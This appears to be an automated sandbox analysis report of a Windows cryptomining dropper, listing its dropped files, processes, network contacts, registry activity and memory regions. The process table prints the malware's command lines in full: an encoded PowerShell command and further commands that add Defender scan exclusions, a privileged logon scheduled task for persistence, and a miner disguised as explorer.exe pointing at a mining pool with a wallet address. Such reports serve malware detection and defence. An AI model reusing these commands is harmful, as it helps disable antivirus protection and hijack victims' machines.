Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C5Lg2JSPlD.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\C5Lg2JSPlD.exe.log
|
CSV text
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Miner.exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\Microsoft\Libs\WR64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\Microsoft\Libs\sihost64.exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\Windows\System32\services64.exe
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_conhost.exe_bcf865d76fe77467e295cbb71eb4f98b4a9050eb_1260788c_3647c876-7f6c-415b-b9ba-02d3ee7c6d1e\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DF1.tmp.dmp
|
Mini DuMP crash report, 15 streams, Mon Oct 7 22:20:50 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35D2.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3631.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER364E.tmp.csv
|
Unknown
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WER368E.tmp.txt
|
Unknown
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d5jlhc4.3if.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32dtwenn.klq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53bkrtvl.oii.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czhap3co.go0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esvl1jl3.amr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0enqpf1.2s0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1krsgs1.qks.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kml5b2ko.yo1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1ul0p5e.mkl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o11vzrcn.0p4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj3mgrzo.tgp.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjzdy0sh.nn5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rv5jia54.nbf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s003a3yf.kah.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzf3qx3j.nbr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vatgffv0.rzd.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkamg2rf.cv3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wutzwpln.eva.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yglhccxf.iey.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi0o33m3.4c4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\System32\wbem\Performance\WmiApRpl_new.h
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
modified
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
||
|
C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 28 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\C5Lg2JSPlD.exe
|
"C:\Users\user\Desktop\C5Lg2JSPlD.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAZgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYgBoACMAPgA="
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Users\user\AppData\Local\Temp\Miner.exe
|
"C:\Users\user~1\AppData\Local\Temp\Miner.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
"C:\Windows\System32\conhost.exe" "C:\Users\user~1\AppData\Local\Temp\Miner.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive)
-Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive)
-Force"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\schtasks.exe
|
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"cmd" cmd /c "C:\Windows\system32\services64.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\services64.exe
|
C:\Windows\system32\services64.exe
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
|
|
|
|
C:\Windows\System32\conhost.exe
|
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive)
-Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive)
-Force"
|
|
|
|
C:\Windows\System32\Microsoft\Libs\sihost64.exe
|
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
|
|
|
|
C:\Windows\explorer.exe
|
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr
--cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx
--pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4="
--cinit-stealth
|
|
|
|
C:\Windows\System32\conhost.exe
|
"C:\Windows\System32\conhost.exe" "/sihost64"
|
|
|
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
|
||
|
C:\Windows\System32\wbem\WMIADAP.exe
|
wmiadap.exe /F /T /R
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k WerSvcGroup
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -pss -s 428 -p 3268 -ip 3268
|
||
|
C:\Windows\System32\WerFault.exe
|
C:\Windows\system32\WerFault.exe -u -p 3268 -s 1096
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
|
There are 20 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://upx.sf.net
|
unknown
|
||
|
https://xmrig.com/benchmark/%s
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://xmrig.com/wizard
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://xmrig.com/wizard%s
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://xmrig.com/docs/algorithms
|
unknown
|
There are 2 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pool.hashvault.pro
|
95.179.241.203
|
|
|
|
time.windows.com
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
95.179.241.203
|
pool.hashvault.pro
|
Netherlands
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\3268
|
Terminator
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\3268
|
Reason
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\3268
|
CreationTime
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
ProgramId
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
FileId
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
LongPathHash
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
Name
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
OriginalFileName
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
Publisher
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
Version
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
BinFileVersion
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
BinaryType
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
ProductName
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
ProductVersion
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
LinkDate
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
BinProductVersion
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
Size
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
Language
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
IsOsComponent
|
||
|
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
|
Usn
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
|
Blob
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qtltntcbrequaj
|
Reason
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
|
DeviceId
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02bvfzdetyamjjhr
|
Provision Monday, October 07, 2024 18:21:04
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
|
AppIdList
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
URL
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
Name
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
P3P
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
|
Flags
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02psbtbqujhpqftm
|
Request Monday, October 07, 2024 18:21:10
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02psbtbqujhpqftm
|
Response Monday, October 07, 2024 18:21:10
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02psbtbqujhpqftm
|
Reason
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
|
DeviceId
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
|
AppIdList
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qtltntcbrequaj
|
AppIdList
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
|
ValidDeviceId
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
|
GlobalDeviceUpdateTime
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
|
DeviceId
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
|
ValidDeviceId
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
|
DeviceId
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
|
DeviceId
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
|
ValidDeviceId
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02psbtbqujhpqftm
|
AppIdList
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
|
DeviceId
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
|
ValidDeviceId
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
|
DeviceId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\ExtendedProperties
|
LID
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
|
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
|
DeviceId
|
There are 62 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1F0CC3E8000
|
heap
|
page read and write
|
|
|
|
1F0CC3EC000
|
heap
|
page read and write
|
|
|
|
1F0CC3EE000
|
heap
|
page read and write
|
|
|
|
1F0CC3E8000
|
heap
|
page read and write
|
|
|
|
79F000
|
stack
|
page read and write
|
||
|
23A4000
|
heap
|
page read and write
|
||
|
20AB6820000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3879000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC1E1000
|
heap
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFCF000
|
heap
|
page read and write
|
||
|
205D4F50000
|
remote allocation
|
page read and write
|
||
|
2670000
|
trusted library allocation
|
page read and write
|
||
|
20ACEF80000
|
trusted library allocation
|
page read and write
|
||
|
22D0000
|
heap
|
page read and write
|
||
|
1803000
|
unkown
|
page readonly
|
||
|
1AD011C0000
|
heap
|
page read and write
|
||
|
1F0B3836000
|
heap
|
page read and write
|
||
|
7217BBE000
|
stack
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
|
1AD00EE0000
|
heap
|
page read and write
|
||
|
1E12000
|
unkown
|
page readonly
|
||
|
1F0B37B0000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB2F63000
|
unkown
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1AD03BD4000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFB8000
|
heap
|
page read and write
|
||
|
1C4821E0000
|
heap
|
page read and write
|
||
|
1F0B37D3000
|
heap
|
page read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
72179B7000
|
stack
|
page read and write
|
||
|
20ACEFD4000
|
heap
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC190000
|
trusted library allocation
|
page read and write
|
||
|
721888C000
|
stack
|
page read and write
|
||
|
4211000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37BE000
|
heap
|
page read and write
|
||
|
20ACEFCD000
|
heap
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
20AB2FEF000
|
heap
|
page read and write
|
||
|
175C06C8000
|
heap
|
page read and write
|
||
|
1F0B3809000
|
heap
|
page read and write
|
||
|
2673000
|
heap
|
page read and write
|
||
|
20AB2D90000
|
heap
|
page read and write
|
||
|
20ACEFF1000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
21C2000
|
unkown
|
page read and write
|
||
|
1803000
|
unkown
|
page readonly
|
||
|
7FFB1E870000
|
unkown
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1803000
|
unkown
|
page readonly
|
||
|
4D6000
|
heap
|
page read and write
|
||
|
1F0B380B000
|
heap
|
page read and write
|
||
|
2454000
|
heap
|
page read and write
|
||
|
1F0B37A0000
|
trusted library allocation
|
page read and write
|
||
|
14C000
|
stack
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFD4000
|
heap
|
page read and write
|
||
|
1F0B37ED000
|
heap
|
page read and write
|
||
|
20AB6730000
|
trusted library allocation
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB2F9D000
|
unkown
|
page read and write
|
||
|
1AD02A90000
|
heap
|
page read and write
|
||
|
1AD02B20000
|
heap
|
page execute and read and write
|
||
|
A6109FF000
|
unkown
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
|
721870E000
|
stack
|
page read and write
|
||
|
20AB65D0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3767000
|
trusted library allocation
|
page read and write
|
||
|
40C000
|
unkown
|
page readonly
|
||
|
20ACE8F0000
|
trusted library allocation
|
page read and write
|
||
|
4200000
|
heap
|
page execute and read and write
|
||
|
23C6000
|
heap
|
page read and write
|
||
|
20ACEF9B000
|
heap
|
page read and write
|
||
|
1F0B37A9000
|
heap
|
page read and write
|
||
|
1F0B37E9000
|
heap
|
page read and write
|
||
|
7FFAAC582000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB6810000
|
trusted library allocation
|
page read and write
|
||
|
20AB6720000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3806000
|
heap
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
1F0C41FE000
|
trusted library allocation
|
page read and write
|
||
|
237C000
|
heap
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0C4BFE000
|
trusted library allocation
|
page read and write
|
||
|
AB45A7E000
|
unkown
|
page readonly
|
||
|
30FF000
|
heap
|
page read and write
|
||
|
20AB67F0000
|
heap
|
page execute and read and write
|
||
|
AB459FD000
|
stack
|
page read and write
|
||
|
7FFAAC4E8000
|
trusted library allocation
|
page execute and read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
20AB6860000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFDF000
|
heap
|
page read and write
|
||
|
1F0B3710000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
heap
|
